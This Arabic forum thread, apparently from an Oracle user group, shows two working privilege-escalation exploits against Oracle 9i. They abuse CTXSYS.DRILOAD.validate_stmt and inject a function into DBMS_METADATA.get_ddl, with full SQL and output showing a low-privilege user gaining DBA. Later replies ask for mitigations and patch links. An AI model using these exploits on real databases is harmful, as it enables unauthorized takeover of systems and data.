Indirect Privilege Escalation

السلام عليكم ..........
في الواقع لا اعلم هل هذا الموضوع مطروح من قبل أو لا عموما احببت ان اسرد هذا الموضوع لكي تعم الفائدة ولكي نجد الحل في التخلص منها .

الموضوع هذا يطرح الطرق التي من خلالها يمكنك كمستخدم عادي في DATABASE
لا تملك إلا القليل من الصلاحيات تستطيع الترقي إلى مستوى اعلى ولكن بشكل غير مباشر .
وسوف أضع الملف الخاص بهذا الموضوع (ليس الان لأني ليس على جهازي) وفيه عدة طرق للحصول على امتياز DBA عموما نكتفي هنا بهذه الأمثلة :

هنالك عدة طرق للحصول على الامتياز(DBA ):

Exploiting built-in packages -(1)

هذا المثال للتوضيح :

Example(1)
=================================
Connect system/ system(password)

Create user hacker identified by stealing;

grant connect,resource to hacker;

connect hacker/stealing
1)-

select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER CONNECT NO YES NO
HACKER RESOURCE NO YES NO
2)_


exec ctxsys.driload.validate_stmt('grant dba to HACKER ');

ERROR at line 1:
ORA-06510: PL/SQL: unhandled user-defined exception
ORA-06512: at "CTXSYS.DRILOAD", line 42
ORA-01003: no statement parsed
ORA-06512: at line 1
3)_
select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER CONNECT NO YES NO
HACKER DBA NO YES NO
HACKER RESOURCE NO YES NO

الطريقة الثانية :

Exploiting DBMS_METADATA- (2)

Example(2)
=================================
connect hacker/stealing

select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER CONNECT NO YES NO
HACKER RESOURCE NO YES NO

1)-

create or replace function hacker.hack return varchar2
authid current_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to hacker ';
return '';
end;
/
Function created.




2)-

SELECT SYS.DBMS_metadata.get_ddl ('''||hacker.hack()||''','') FROM DUAL;


ERROR:
ORA-31600: invalid input value '||scott.hack()||' for parameter
OBJECT_TYPE in function GET_DDL
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 105
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1536
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1900
ORA-06512: at "SYS.DBMS_METADATA_INT", line 3606
ORA-06512: at "SYS.DBMS_METADATA", line 504
ORA-06512: at "SYS.DBMS_METADATA", line 560
ORA-06512: at "SYS.DBMS_METADATA", line 1221
ORA-06512: at line 1
no rows selected


3)-

select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER CONNECT NO YES NO
HACKER DBA NO YES NO
HACKER RESOURCE NO YES NO




السؤال هنا كيف نمنع العمليات السابقة من الحدوث ؟؟؟؟؟؟؟؟؟؟؟

الرجاء ممن لديه المعرفة الاجابة
اتمنى ان يكون الموضوع قد اعجبكم ...........................................

اخوي ممكن تذك الاصدار الذي قمت بالتجربة عليه؟؟

لاني سمعت انه كان في ثغرة باحد اصدارات ال 9i ولكن تمت الترقية بباتش بعد اسبوع فقط من اصدار النسخة

ارجو منك ان تذكر لنا اصدار الداتابيز الذي جربت عليه كل هذه الطرق

شكر لك للتفاعل معي و الداتابيز هي لـ Oracle9i Release 9.2.0.1.0
وارجو من الاخوان الي يشتغلون على الداتابيز 10g التجربة
وكتابة النتيجة

وهذا الملف الذي وعدتكم به (اتمنى ان تستفيدون منه)
وهو يتكلم في الغالب عن 9i والثغرات التي لم اذكرها التي تستطيع من خلالها الترقي من مستخدم عادي إلى dba

Oracle_20Security_20Masterclass.pdf

شكرا على الملف
وفي الحقيقة بالنسبة للثغرات تتم معالجتها حال اكتشافها من خلال الميتالينك بتنزيل اخر الباتشات
يمكنك قراءة الموضوع التالي في المنتدى يتحدث عن احد اصدارات ال 10g

http://www.araboug.org/ib/index.php?showtopic=18097

لوسمحت تضع الرابط للباتشات وماهي الأن datbase الخالية من هذه الثغرات

ممكن المساعدة ياشباب

ياشباب ممكن الموقع لتحميل الباتشات

thanks